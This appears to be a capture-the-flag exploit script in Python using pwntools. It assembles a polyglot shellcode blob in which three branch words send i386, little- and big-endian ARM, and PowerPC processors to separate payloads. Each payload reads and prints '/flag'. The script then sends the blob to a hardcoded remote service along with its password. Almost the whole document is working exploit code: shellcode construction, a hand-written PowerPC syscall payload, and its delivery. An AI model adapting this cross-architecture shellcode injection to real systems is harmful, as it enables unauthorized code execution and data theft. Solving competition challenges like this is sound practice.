#!/usr/bin/env python
from pwn import *
import time, sys
context('linux')

# Three 4-byte "polyglot" words.  Each decodes to something harmless on
# every target and to a forward branch on exactly one of them, so a single
# blob can fan out into per-architecture payloads placed at fixed offsets.
# The mnemonics are the author's notes and were not re-verified here; the
# only properties the layout depends on are the three branch targets
# (464, 135 and 208), which must agree with the insert() offsets below.
#
# poly1 -- ARMEL: b $ + 464                (taken: armel payload)
#          ARMEB: andvc r0, r0, #234
#          i386:  jb $ + 0; add dl, ch
#          ppc:   andi r0, r16, 234
# poly2 -- i386:  pop edi; pop edi; jmp $ + 127   (taken: i386 payload;
#                 a rel8 jmp is measured from the *next* instruction, which
#                 starts at offset 8, so it lands at 8 + 127 == 135)
#          ppc:   rlwnm. r31, r26, r29, 13, 31
#          ARMEB: svcpl 0x005feb7f
# poly3 -- ppc:   beq- $ + 200               (taken: ppc payload, 8 + 200 == 208)
#          ARMEB: orrmi r0, r2, r8, asr #1
poly1, poly2, poly3 = [unhex(h) for h in ('720000ea', '30f0eb7f', '418200c8')]
# cat shellcode for various architecture: each payload first moves the stack
# pointer up by 0x400 (presumably so that pushes made by the syscalls cannot
# clobber the blob itself, which the service loads near the SP it reports
# below -- confirm), then open/read/write "/flag" to stdout and spins forever,
# presumably so the process never returns into unintended bytes.
i386 = asm('add esp, 0x400', shellcode.cat('/flag', arch = 'i386'), shellcode.infloop(arch = 'i386'))
armel = asm('add sp, #0x400', shellcode.cat('/flag', arch = 'arm'), shellcode.infloop(arch = 'arm'))
# This is an ugly hack: the assembler only emits little-endian ARM, so the
# big-endian variant is produced by reversing every 4-byte word.  That also
# reverses the bytes of the embedded "/flag\0\0\0" string ("/fla","g\0\0\0"
# become "alf/","\0\0\0g"), which the replace() below puts back.  Any other
# multi-byte data in the payload would be mangled the same way and is not
# fixed up here.
armeb = armel
armeb = ''.join(s[::-1] for s in group(4, armeb))
armeb = armeb.replace('alf/\x00\x00\x00g', '/flag\x00\x00\x00')
# No ppc shellcode in pwntools :(  -- hand-written equivalent.  Linux/ppc
# syscall convention: number in r0, arguments in r3.., result in r3.
#   b end / bl start : the bl leaves the address of the string that follows
#                      it in LR, so "mflr 3" yields a pointer to "/flag"
#   r0=5  open(r3="/flag", r4=0 /* O_RDONLY */)            -> fd in r3
#   r0=3  read(r3=fd, r4=r1 /* stack used as buffer */, r5=255) -> count in r3
#   r0=4  write(r3=1 /* stdout */, r4=r1, r5=count)
#   infloop          : park the thread instead of returning
# A failed open or read is not checked; whatever r3 holds is passed straight
# on to the next call.
ppc = asm('''
b end
start:
mflr 3
li 0, 5
li 4, 0
sc
li 0, 3
ori 4, 1, 0
li 5, 255
sc
ori 5, 3, 0
li 0, 4
li 3, 1
ori 4, 1, 0
li 5, 255
sc
infloop: b infloop
end:
bl start
.asciz "/flag"
''', arch = 'powerpc')
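# Output buffer for the combined blob, one slot per byte; None means "not
# yet written".  1450 only needs to exceed the highest offset the layout
# below uses (armel ends at 544 per the layout notes); trailing unused
# slots are trimmed off before sending.
code = [None] * 1450


def insert(offset, s):
    """Copy the bytes of *s* into ``code`` starting at *offset*.

    Every target slot must still be empty: two payloads overlapping would
    silently corrupt one of them, so a collision (or a range that does not
    fit in the buffer) aborts via die() before anything is written.
    """
    values = bytearray(s)  # byte values 0..255; works for str (py2) and bytes
    end = offset + len(values)
    if offset < 0 or end > len(code):
        die("Trying to insert %d bytes at %d, but the buffer only holds %d"
            % (len(values), offset, len(code)))
    # Check the whole range first so a failed insert leaves the buffer
    # untouched rather than half-written.
    for n in range(offset, end):
        if code[n] is not None:
            die("Trying to insert at %d, but something is already there" % n)
    code[offset:end] = values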
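# LAYOUT of the final blob (byte offsets; payload lengths are the author's):
#   0000:0004 poly1 (forks ARMEL to 0 + 464 == 464)
#   0004:0008 poly2 (forks i386 to 135: a rel8 jmp is measured from the next
#                    instruction, which starts at offset 8, so 8 + 127 == 135)
#   0008:0012 poly3 (forks ppc to 8 + 200 == 208)
#   0012:0092 armeb (len 80; per the polyglot notes ARMEB takes no branch
#                    and runs straight into this)
#   0135:0188 i386  (len 53)
#   0208:0282 ppc   (len 74)
#   0464:0544 armel (len 80)
# insert() aborts on overlap, so these offsets are also checked at run time.
insert(0, poly1)
insert(4, poly2)
insert(8, poly3)
insert(12, armeb)
insert(135, i386)
insert(208, ppc)
insert(464, armel)

# Drop the unused tail of the buffer in one pass (no repeated slicing), then
# turn the remaining slots into a byte string; gaps between payloads become
# NUL bytes.
end = len(code)
while end and code[end - 1] is None:
    end -= 1
code = unordlist([0 if c is None else c for c in code[:end]])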
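# Talk to the challenge service.  Host, port and password are the CTF
# fixtures as given.  The service announces its stack pointer and then takes
# the raw blob on a single line; NOTE(review): nothing here checks that the
# blob is free of newline bytes, which a line-oriented reader would cut at.
r = remote('54.72.223.108', 30000, timeout = None)
r.sendlineafter('Password: ', 'w0rk_tHaT_tAlEnTeD_t0nGu3')
r.sendlineafter('SP is 0x42000000.', code)

# Echo whatever the service sends back (the cat'ed flag) until it closes
# the connection.  Only EOF ends the loop quietly; any other error now
# surfaces instead of being swallowed by a bare except.
while True:
    try:
        s = r.recvline()
    except EOFError:
        break
    if not s:
        break
    line = s.strip()
    if line:
        # write() instead of the py2 print statement: same output, and the
        # line stays valid under both Python 2 and 3.
        sys.stdout.write(line + '\n')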